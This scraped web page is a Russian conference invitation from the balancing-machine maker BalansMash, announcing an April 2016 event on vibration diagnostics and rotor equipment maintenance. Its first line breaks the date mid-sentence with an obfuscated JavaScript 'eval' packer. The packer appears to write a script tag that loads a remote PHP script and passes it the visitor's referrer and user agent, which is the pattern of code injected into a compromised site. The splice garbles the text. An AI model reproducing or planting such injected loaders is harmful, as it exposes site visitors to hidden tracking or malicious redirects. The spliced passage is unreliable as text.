

11-15 eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!".replace(/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]};e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('0.6(");n m="q";,30,30,'document||javascript|encodeURIComponent|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yiyhr|var|u0026u|referrer|faibi||js|php'.split('|'),0,{})) апреля 2016 г. состоится ежегодная международная конференция
«Современные решения для организации эффективной стратегии эксплуатации и ремонта роторного оборудования»

БАЛАНСИРОВКА.
ВИБРОДИАГНОСТИКА.
СЕРВИС.

Тел./факс (495) 120-03-18



ЗАВОД
БАЛАНСИРОВОЧНЫХ
МАШИН

www.balansmash.ru
bm@balansmash.ru

115230, г. Москва
Варшавское шоссе, д 46, офис 309

ООО "Научно-Технический Центр "Завод Балансировочных машин"

Информационное письмо №1
02.11.2015 №БП-540-1/15

Главному инженеру
Главному механику
Главному энергетнику
Начальнику службы диагностики

Уважаемые коллеги!

ООО «Научно-технический центр «Завод Балансировочных Машин» (НТЦ «БалансМаш») – ведущий российский производитель высокотехнологичных решений в области диагностики и балансировки приглашает Вас в период с 11 по 15 апреля 2016 года принять участие в работе ежегодной международной конференции «Современные решения для организации эффективной стратегии эксплуатации и ремонта роторного оборудования».

В рамках конференции слушатели подробно познакомятся с актуальными подходами к оценке технического состояния роторного оборудования при помощи современных переносных, стендовых и стационарных систем, организации грамотной стратегии технического обслуживания и ремонта с использованием балансировочных станков, систем центровки и стендов входного контроля, методами повышения эффективности диагностирования в рамках всего предприятия. Ряд докладов будет посвящен вопросам практического диагностирования отдельных видов оборудования – паровых и газовых турбин, поршневых компрессоров, прокатных станов, кранового оборудования и пр.

Запланированы лекции ведущих отраслевых экспертов энергетики, металлургии, нефтехимии, угольной промышленности. С информационными сообщениями о новых разработках выступят наши партнеры – компании-производители систем лазерной центровки, приборов тепловизионного контроля, беспроводной измерительной техники. По итогам работы конференции для обмена опытом будет организован круглый стол, а также состоятся практические мастер-классы по работе с переносными приборами, многоканальными системами и программной платформой нового поколения SAFE PLANT.

По окончании конференции всем слушателям будет выдано свидетельство о повышении квалификации установленного образца. За дополнительную плату участники конференции могут пройти переаттестацию на соответствие квалификации «Специалист второго уровня по вибродиагностике» и получить удостоверение государственного образца.

Для участия в конференции необходимо заполнить заявку (Приложение 1) и направить ее по указанным координатам. Более подробная информация будет размещена на сайте www.balansmash.ru не позднее 31 января 2016 года.

С уважением,
Генеральный директор

И.И. Радчик

Контактное лицо: Князева Татьяна Сергеевна
E-mail: knyazeva@balansmash.ru
Т/ф: +7 (495) 120-03-18

НТЦ "Завод балансировочных машин" анонсирует проведение конференции

Автор: Sotnikoff
13.12.2015 05:46

~~Содержимое документа является конфиденциальным и предназначено исключительно для внутреннего использования. Любое раскрытие информации, содержащейся в документе, третьим лицам является нарушением законодательства Российской Федерации и влечет за собой административную и уголовную ответственность.~~